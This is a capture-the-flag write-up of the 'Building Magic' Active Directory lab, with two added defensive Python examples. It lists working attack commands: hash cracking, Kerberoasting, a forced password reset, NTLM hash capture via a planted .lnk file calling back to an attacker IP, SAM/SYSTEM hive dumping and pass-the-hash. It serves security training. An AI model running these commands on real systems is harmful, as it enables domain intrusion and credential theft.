# Building Magic

{% embed url="<https://courses.hacksmarter.org/courses/8c4fe505-a724-407f-a425-8e17503d4380>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

This is the first machine release on Hack Smarter <https://courses.hacksmarter.org/dashboard>!

Initially, we are provided with the following scope and leaked database hashes:

## Scope and Objective <a href="#user-content-scope-and-objective" id="user-content-scope-and-objective"></a>

{% code overflow="wrap" %}

```
Objective: As a penetration tester on the Hack Smarter Red Team, your objective is to achieve a full compromise of the Active Directory environment.

Initial Access: A prior enumeration phase has yielded a leaked database containing user credentials (usernames and hashed passwords). This information will serve as your starting point for gaining initial access to the network.

Execution: Your task is to leverage the compromised credentials to escalate privileges, move laterally through the Active Directory, and ultimately achieve a complete compromise of the domain.

*Note to user: *To access the target machine, you must add the following entries to your /etc/hosts file:

buildingmagic.local
dc01.buildingmagic.local
```

{% endcode %}

**Leaked Database File:**

```
id	username	full_name	role		password
1	r.widdleton	Ron Widdleton	Intern Builder	c4a21c4d438819d73d24851e7966229c
2	n.bottomsworth	Neville Bottomsworth Plannner	61ee643c5043eadbcdc6c9d1e3ebd298
3	l.layman	Luna Layman	Planner		8960516f904051176cc5ef67869de88f
4	c.smith		Chen Smith	Builder		bbd151e24516a48790b2cd5845e7f148
5	d.thomas	Dean Thomas	Builder		4d14ff3e264f6a9891aa6cea1cfa17cb
6	s.winnigan	Samuel Winnigan	HR Manager	078576a0569f4e0b758aedf650cb6d9a
7	p.jackson	Parvati Jackson	Shift Lead	eada74b2fa7f5e142ac412d767831b54
8	b.builder	Bob Builder	Electrician	dd4137bab3b52b55f99f18b7cd595448
9	t.ren		Theodore Ren	Safety Officer	bfaf794a81438488e57ee3954c27cd75
10	e.macmillan	Ernest Macmillan Surveyor	47d23284395f618bea1959e710bc68ef
```

## Recon

The Nmap scan of `10.1.168.5` revealed numerous Windows/Active Directory-related services, including DNS `53`, Kerberos `88/464`, LDAP `389/636/3268/3269`, SMB `139/445`, RPC `135/593`, and RDP `3389`, alongside web services on ports `80` and `8080`. This indicates the host is likely a domain controller with both directory services and a web application attack surface.

```
nmap -Pn 10.1.168.5   
```

<figure><img src="/files/Dpdl86I7a8FHL1JpcJDN" alt=""><figcaption></figcaption></figure>

The default script and service scan does not provide any further information; it only confirms the domain names that are already known from the scope.

```
nmap -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,3269,3389,8080 -Pn 10.1.168.5 
```

```
BUILDINGMAGIC.LOCAL
DC01.BUILDINGMAGIC.LOCAL
```

## Access as r.widdleton

We then try to crack the leaked hashes with hashcat (mode `0`, raw MD5) and are able to crack only one password with rockyou.

```
hashcat -a0 -m0 hashes.txt /usr/share/wordlists/rockyou.txt --username --show
```

<figure><img src="/files/G0rh5AKHBNb5ZiaRw8xY" alt=""><figcaption></figcaption></figure>

Further hashes could be cracked using the site `https://crackstation.net/`.

<figure><img src="/files/QMb5Cd3Yu1GoDkhbmi5d" alt=""><figcaption></figcaption></figure>
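Before spending cracking time, a quick audit of the leaked file tells a defender what is actually exposed. The following is an added example, not part of the original writeup: it parses the tab-separated dump above (tolerating the rows where the tab between full name and role is missing), classifies the hash format by length, and flags accounts that share an identical hash. The rows are copied from the hand-out plus one constructed row (`x.example`) to exercise the reuse check.

```python
import re
from collections import defaultdict

# Constructed copy of a few rows from the leaked table above (plus one made-up row
# that reuses r.widdleton's hash). Two rows of the original lack the tab between
# full name and role, so the parser does not trust column positions: it takes the id
# and username from the front, the hash from the end, and keeps the middle as text.
LEAKED_DB = """\
id\tusername\tfull_name\trole\t\tpassword
1\tr.widdleton\tRon Widdleton\tIntern Builder\tc4a21c4d438819d73d24851e7966229c
2\tn.bottomsworth\tNeville Bottomsworth Plannner\t61ee643c5043eadbcdc6c9d1e3ebd298
9\tt.ren\t\tTheodore Ren\tSafety Officer\tbfaf794a81438488e57ee3954c27cd75
99\tx.example\tConstructed Row\tTester\tc4a21c4d438819d73d24851e7966229c
"""

ROW_RE = re.compile(r"^(\d+)\s+(\S+)\s+(.*?)\s+([0-9a-fA-F]+)$")

def parse_leak(text):
    """Return one dict per data row; the header and any malformed line are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append({"id": int(m.group(1)), "user": m.group(2),
                         "desc": m.group(3).strip(), "hash": m.group(4).lower()})
    return rows

def hash_format(h):
    """Length-based guess; a bare 32-hex value with no salt column is consistent with raw MD5."""
    return {32: "md5", 40: "sha1", 64: "sha256"}.get(len(h), "unknown")

def audit(rows):
    """Flag unsalted fast-hash storage and identical hashes (same password on several accounts)."""
    findings = []
    by_hash = defaultdict(list)
    for r in rows:
        fmt = hash_format(r["hash"])
        if fmt != "unknown":
            findings.append((r["user"], f"unsalted {fmt}: fast to guess offline, rehash with bcrypt/argon2"))
        by_hash[r["hash"]].append(r["user"])
    for users in by_hash.values():
        if len(users) > 1:
            findings.append((",".join(sorted(users)), "identical hash: password shared between accounts"))
    return findings

if __name__ == "__main__":
    for who, msg in audit(parse_leak(LEAKED_DB)):
        print(f"{who}: {msg}")
```

Unsalted MD5 is why a single wordlist pass and an online lookup table were enough here; any account whose hash appears in such a dump should be treated as compromised and reset, regardless of whether it cracked.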

From the Nmap scan, we know that `SMB` is available. We use `NetExec` to test the cracked passwords against it and are successful with the user `r.widdleton`.

```
nxc smb 10.1.168.5 -u 't.ren' -p 'REDACTED' --shares
```

```
nxc smb 10.1.168.5 -u 'r.widdleton' -p 'REDACTED' --shares
```

<figure><img src="/files/0lAfodyPcVrpv1hulYEF" alt=""><figcaption></figcaption></figure>

We see that there is a share called `File-Share`, but we have neither `read` nor `write` access to it. We do, however, have `read` access to the `IPC$` share, which allows us to perform a `rid` brute force.

<https://www.netexec.wiki/smb-protocol/enumeration/enumerate-users-by-bruteforcing-rid>

## Username Enumeration

We will see if we can find other users besides those with leaked credentials. To do this, we use the aforementioned `rid` brute force.

```
nxc smb 10.1.168.5 -u 'r.widdleton' -p 'REDACTED' --rid
```

<figure><img src="/files/MnXnGbwUgx9olKG6V73p" alt=""><figcaption></figcaption></figure>

And we are able to get the following users, which might come in handy later.

```
h.potch
r.widdleton
r.haggard
h.grangon
a.flatch
```

## Access as r.haggard

With the credentials from `r.widdleton`, we continue with the enumeration and use Bloodhound for this purpose. Since I had problems with DNS timeouts, I used DNSChef for this case.

```
dnschef.py --fakeip 10.1.168.5 -q
```

<figure><img src="/files/LiWDiOyi0zLKebVwWqkI" alt=""><figcaption></figcaption></figure>

We run the collector script `bloodhound-ce.py` with the credentials of `r.widdleton`.

{% code overflow="wrap" %}

```
bloodhound-ce.py --zip -c All -d BUILDINGMAGIC.LOCAL -u r.widdleton -p REDACTED -dc DC01.BUILDINGMAGIC.LOCAL -ns 127.0.0.1
```

{% endcode %}

<figure><img src="/files/iU0fwXozDqCEfZCg6RGP" alt=""><figcaption></figcaption></figure>

We feed the data into Bloodhound and analyse it using the available Cypher queries and the `Outbound Object Control` relationships. We see that `r.widdleton` does not have any special permissions, but we find a Kerberoastable user: `r.haggard`.

<figure><img src="/files/UEztYR1Uoss421um7VoC" alt=""><figcaption></figcaption></figure>

We use `GetUserSPNs.py` to Kerberoast the user using the credentials of `r.widdleton`. And we receive the `Kerberos 5, etype 23, TGS-REP` blob from `r.haggard`.

{% code overflow="wrap" %}

```
GetUserSPNs.py -dc-host DC01.BUILDINGMAGIC.LOCAL BUILDINGMAGIC.LOCAL/'r.widdleton':'REDACTED' -request
```

{% endcode %}

<figure><img src="/files/7qIqAKMfLSsUSPBEXSXe" alt=""><figcaption></figcaption></figure>

Fortunately, this could be cracked using hashcat, and we now have access as `r.haggard`.

```
hashcat -m13100 -a0 '<HASH>' /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/R6OwIuBCusggkFmDXZc1" alt=""><figcaption></figcaption></figure>
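From the defender's side, the roast above leaves a characteristic trace on the domain controller: a 4769 event where a user account (`r.widdleton`) requests a service ticket for another user's SPN (`r.haggard`) with RC4 encryption (`0x17`, the etype 23 seen in the blob). The following is an added example, not part of the original writeup; the event records are constructed to mirror that request and use the event's own field names.

```python
from collections import defaultdict

# Constructed records shaped like Windows Security event 4769 (a Kerberos service
# ticket was requested). Field names are the event's own XML data names; the
# values are made up to mirror the GetUserSPNs.py request above. Event 4768 is
# a TGT request and is included only to show it is ignored.
EVENTS = [
    {"EventID": 4769, "TargetUserName": "r.widdleton@BUILDINGMAGIC.LOCAL",
     "ServiceName": "r.haggard", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.200.0.156"},
    {"EventID": 4769, "TargetUserName": "r.widdleton@BUILDINGMAGIC.LOCAL",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.200.0.156"},
    {"EventID": 4769, "TargetUserName": "DC01$@BUILDINGMAGIC.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12",
     "IpAddress": "::ffff:10.1.168.5"},
    {"EventID": 4768, "TargetUserName": "r.widdleton",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.200.0.156"},
]

# 0x17 = RC4-HMAC (etype 23), 0x18 = RC4-HMAC-EXP. Both key the ticket with the
# plain NT hash of the service account, which is what makes them cheap to crack.
RC4_ETYPES = {"0x17", "0x18"}

def is_roast_candidate(ev):
    """True for a TGS request that hands out an RC4 ticket for a user account's SPN."""
    if ev.get("EventID") != 4769:
        return False
    svc = ev.get("ServiceName", "")
    # Machine accounts and krbtgt have long random keys, so roasting them is not
    # practical; dropping them keeps the signal focused on user-owned SPNs.
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return ev.get("TicketEncryptionType", "").lower() in RC4_ETYPES

def kerberoast_alerts(events):
    """Group suspicious requests by (requesting account, source IP) with the SPN owners hit."""
    hits = defaultdict(set)
    for ev in events:
        if is_roast_candidate(ev):
            hits[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {key: sorted(svcs) for key, svcs in hits.items()}

if __name__ == "__main__":
    for (who, src), svcs in kerberoast_alerts(EVENTS).items():
        print(f"{who} from {src} requested RC4 tickets for: {', '.join(svcs)}")
```

Tune the RC4 filter to your environment, since legacy applications can legitimately request RC4 tickets; the durable fix is AES-only service accounts (or gMSAs) with long random passwords, which turns a cracked TGS-REP into a dead end.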

## Access as h.potch

We take another look at the data we collected with Bloodhound. Let's take a closer look at `r.haggard`'s `Outbound Object Control`. The user is able to change `h.potch`'s password. The user `h.potch` does not appear to have any further permissions or usable relationships in Bloodhound, but we will see what else he can do in a moment.

<figure><img src="/files/xcHMdPVPO3GTt3gA9HXH" alt=""><figcaption></figcaption></figure>

Next, we change the password of `h.potch` with the credentials of `r.haggard` using `net rpc`.

{% code overflow="wrap" %}

```
net rpc password 'h.potch' 'newP@ssword2022' -U 'BUILDINGMAGIC.LOCAL/r.haggard%REDACTED' -S DC01.BUILDINGMAGIC.LOCAL
```

{% endcode %}

<figure><img src="/files/4PFlrcucHgspB9S0eyyJ" alt=""><figcaption></figcaption></figure>

We enumerate the shares using NetExec and see that we are now able to `read` and `write` to the share `File-Share` that we have already discovered.

```
nxc smb BUILDINGMAGIC.LOCAL -u 'h.potch' -p 'newP@ssword2022' --shares
```

<figure><img src="/files/RqOzpD4VBsBY0tmaAvkx" alt=""><figcaption></figcaption></figure>

## Shell as h.grangon

However, the share appears to be empty.

```
smbclient //10.1.168.5/File-Share -U 'BUILDINGMAGIC.LOCAL\h.potch%newP@ssword2022'
```

<figure><img src="/files/oGUkX1I8Mtd0lnnz0Lb5" alt=""><figcaption></figcaption></figure>

But since we can `write`, we can try to place a file in the share that connects back to us when it is opened or merely viewed in a file browser, revealing the NTLMv2 hash of the calling user. This is called `NTLM theft`. There is already a handy tool for creating such files:

{% embed url="<https://github.com/Greenwolf/ntlm_theft>" %}

We prepare the files,

```
ntlm_theft.py --verbose --generate modern --server 10.200.0.156 --filename "meetingXYZ"
```

<figure><img src="/files/9oLXQrd13UIYyY912wRl" alt=""><figcaption></figcaption></figure>

and set up Responder (with `root` privileges) to catch the request.

```
responder -I tun0
```

Next, we place the `.lnk` file in that share.

<figure><img src="/files/fazEpWyny2ShR9wNsXYi" alt=""><figcaption></figcaption></figure>

We get a connection with the `NTLMv2-SSP` of `h.grangon`.

<figure><img src="/files/gwNVrczpH3dNwpf5Om57" alt=""><figcaption></figcaption></figure>

Once again, we are able to crack the hash.

```
hashcat -m5600 -a0 '<HASH>' /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/nP4DF3dsr04xMBRJHArO" alt=""><figcaption></figcaption></figure>

In Bloodhound, we see that this user is in the `Remote Management Users` group. This allows us to connect to the machine using evil-winrm. Remember, port `5985` is open.

<figure><img src="/files/Pyx9EEAdQvnAb4uQxCW2" alt=""><figcaption></figcaption></figure>

We connect to the machine using evil-winrm and find the first flag at `C:\Users\h.grangon\Desktop\user.txt`.

```
evil-winrm -i DC01.BUILDINGMAGIC.LOCAL -u 'h.grangon' -p 'REDACTED'
```

<figure><img src="/files/65IRUMHch7NRfVSwi0uo" alt=""><figcaption></figcaption></figure>

## Shell as a.flatch

The user holds a dangerous privilege: `SeBackupPrivilege`. This allows us to copy the `SAM` and `SYSTEM` hives, from which we can then extract hashes using Impacket's `secretsdump.py`.

```
whoami /priv
```

<figure><img src="/files/WOr2DhBxu1BlAyotIkbe" alt=""><figcaption></figcaption></figure>

We save the hives and download them using evil-winrm. The download of the `SYSTEM` hive via `evil-winrm` might take some time.

```
reg save HKLM\SAM "C:\Users\h.grangon\Documents\SAM"
```

```
reg save HKLM\SYSTEM "C:\Users\h.grangon\Documents\SYSTEM"
```

<figure><img src="/files/wweG4RUPULJxdsnJpb5J" alt=""><figcaption></figcaption></figure>

Next, we dump the hashes using Impacket's `secretsdump.py`. We are now in possession of the local Administrator hash. But it seems it cannot be used with either of Impacket's exec tools (`wmiexec.py`, `psexec.py`) or with evil-winrm.

```
secretsdump.py -sam './SAM' -system './SYSTEM' LOCAL
```

<figure><img src="/files/kjMvcKobNOJA6c6LxT84" alt=""><figcaption></figcaption></figure>

Recalling the user list gathered from the `rid` brute force, we try the hash against all the users we know of and are successful with `a.fletch`.

```
nxc smb BUILDINGMAGIC.LOCAL -u users.txt -H REDACTED --continue-on-success
```

<figure><img src="/files/T5YaGFl7Z9VkQzunoLrN" alt=""><figcaption></figcaption></figure>

We see that this user is also an Administrator.

<figure><img src="/files/4eBBE7Ttkv0I5Nys17pR" alt=""><figcaption></figcaption></figure>

We connect to the machine as `a.fletch` using the hash.

<figure><img src="/files/60JrGhw1M6zBf1BKwZgw" alt=""><figcaption></figcaption></figure>

And we find the final flag at `C:\Users\Administrator\Desktop\root.txt`.

<figure><img src="/files/KctBSisNLHSqpeYDGLZD" alt=""><figcaption></figcaption></figure>
